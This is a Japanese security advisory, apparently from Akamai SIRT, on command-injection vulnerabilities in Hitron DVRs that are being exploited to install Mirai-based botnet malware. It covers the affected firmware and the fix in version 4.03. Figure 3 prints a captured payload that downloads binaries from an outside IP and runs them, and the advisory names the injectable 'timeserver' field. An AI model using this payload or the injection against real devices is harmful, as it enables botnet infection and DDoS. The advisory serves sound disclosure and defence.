Hitron DVR で活発に悪用される脆弱性:修正済み、パッチが利用可能
エグゼクティブサマリー
Akamai Security Intelligence Response Team(SIRT)は、 InfectedSlurs アドバイス シリーズの更新版を発行していますが、これは、影響を受けるベンダーの 1 社がパッチとガイダンスをリリースして以来のことです。
Hitron 社内の脆弱性が露呈していることが判明し、次の CVE ID が付与されています。
CVE-2024-22768 — CVSS v3.1 のベーススコアは 7.4 と算定され、CVSS ベクトル文字列は(AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)です。
CVE-2024-22769 — CVSS v3.1 のベーススコアは 7.4 と算定され、CVSS ベクトル文字列は(AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)です。
CVE-2024-22770 — CVSS v3.1 のベーススコアは 7.4 と算定され、CVSS ベクトル文字列は(AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)です。
CVE-2024-22771 — CVSS v3.1 のベーススコアは 7.4 と算定され、CVSS ベクトル文字列は(AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)です。
CVE-2024-22772 — CVSS v3.1 のベーススコアは 7.4 と算定され、CVSS ベクトル文字列は(AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)です。
CVE-2024-23842 — CVSS v3.1 のベーススコアは 7.4 と算定され、CVSS ベクトル文字列は(AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)です。
野放しになっているところを捕捉された悪性のペイロードは、Mirai ベースのマルウェアを 分散サービス妨害(DDoS)攻撃 ボットネット構築目的でインストールします。
当社は、 脅威の痕跡情報(IOC)、Snort ルール、および YARA ルール を独自のリサーチで提供し、野放しになっているこれらの攻撃の試みと、防御側のネットワークにおけるアクティブな感染の可能性を特定するのに役立てました。
知っておくべきこと
Akamai SIRT は、InfectedSlurs 調査の中で、野放しになって活発に悪用されている複数の Hitron DVR デバイスモデルの脆弱性を発見しました。Hitron のデバイスは、Hitron Systems によって韓国で製造されています。
この脆弱性により、認証を受けた攻撃者は、管理インターフェースへの POST リクエストを介して配信されるペイロードを使用して、OS コマンドインジェクションを実行することができます。現在の設定では、キャプチャされたペイロードでデバイスのデフォルトの認証情報が使用されています。
影響を受けるデバイスとファームウェアのバージョンは次のとおりです。
DVR HVR-4781:バージョン 1.03~4.02
DVR HVR-8781:バージョン 1.03~4.02
DVR HVR-16781:バージョン 1.03~4.02
DVR LGUVR-4H:バージョン 1.02~4.02
DVR LGUVR-8H:バージョン 1.02~4.02
DVR LGUVR-16H:バージョン 1.02~4.02
ベンダー(Hitron Systems)は、この脆弱性に対処するための新しいファームウェアバージョンをリリースしました。影響を受けるすべてのモデルについて、できるだけ早くファームウェアバージョン 4.03 以降にアップグレードすることを推奨しています。また、勧告も CISA と KISAから発せられています。KISA も個別の CVE に関する勧告を行っており、以下のリンクで参照することができます。
観測された攻撃
2023 年 10 月下旬、Akamai SIRT のアナリストは、めったに悪用されない TCP ポートを標的としたハニーポットに対する活動が急増していることに気づきました。プローブは頻度が少なく、最初に /cgi-bin/system_ntp.cgi に対する POST リクエストを通じて認証を試み(図 1)、続けてコマンドインジェクション攻撃を試みているようでした(図 2)。 標的にされたデバイスは、コマンドインジェクションによる RCE に対して脆弱な Hitron Systems DVR のデバイスです(図 3)。認証に成功すると、攻撃者はコマンドインジェクション攻撃を仕掛けます。その標的は、 timeserver というパラメーターの脆弱性で、これは /cgi-bin/system_ntp.cgiに POST リクエストを送信する際に使用するパラメーターです。
URL: /cgi-bin/system_ntp.cgi
POST BODY:
enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]
図 1:認証の試み
URL: /cgi-bin/system_ntp.cgi
POST BODY:
lang=ja&useNTPServer=1&synccheck=1&public=0×erver=[RCE
PAYLOAD]&interval=60&enableNTPServer=1
図 2:攻撃の試み
curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr
図 3:キャプチャされた RCE ペイロード
防御
この脆弱性の影響を受けるデバイスを使用している Hitron DVR ユーザーは、RCE の脆弱性を修正した最新のファームウェアバージョン(4.03 以降)に直ちにアップグレードする必要があります。
HVR-4781: バージョン 4.03
HVR-8781: バージョン 4.03
HVR-16781: バージョン 4.03
LGUVR-4H: バージョン 4.03
LGUVR-8H: バージョン 4.03
LGUVR-16H: バージョン 4.03
また、このような脅威や将来の脅威から防御するために、いくつかのセキュリティ対策を講じる必要があります。 まず、影響を受けるデバイスを使用している組織や個人は、セキュリティを強化するために、デフォルトのログイン資格情報を直ちに変更する必要があります。ネットワークトラフィックとログを定期的に監視することで、疑わしいアクティビティを早期に検知することができます。特定された脆弱性に対処するためには、デバイス製造元からのセキュリティパッチおよびアップデートをタイムリーにインストールすることが重要です。
セキュリティ調査担当、脅威インテリジェンスプロバイダー、業界の同業者との間で連携を取ることにより、新たな脅威や脆弱性に関する情報を常に入手できます。最後に、接続されたデバイスの最新インベントリを維持し、 ネットワークセグメンテーション を実装すれば、このような攻撃の潜在的な影響を制限できます。
結論
Hitron Systems と関連デバイスで特定されたセキュリティ上の問題に対処するためには、ユーザーの意識向上、迅速なパッチ適用、予防的監視、サイバーセキュリティコミュニティ内での連携を組み合わせた多面的なアプローチが必要です。これらの対策を講じることで、組織や個人は、観察された悪性のアクティビティによるリスクを大幅に軽減することができます。
今後の情報提供
SIRT やその他の Akamai セキュリティ・リサーチ・グループによる最新の脅威やその他の知見を確認するためには、 X(旧 Twitter)で Akamai をフォロー するか、または SIG ハブをチェックしてください。
この脆弱性をベンダーに報告するためにご協力いただいた CISA、US-CERT、KISA のスタッフの皆様に、Akamai SIRT 一同、感謝申し上げます。
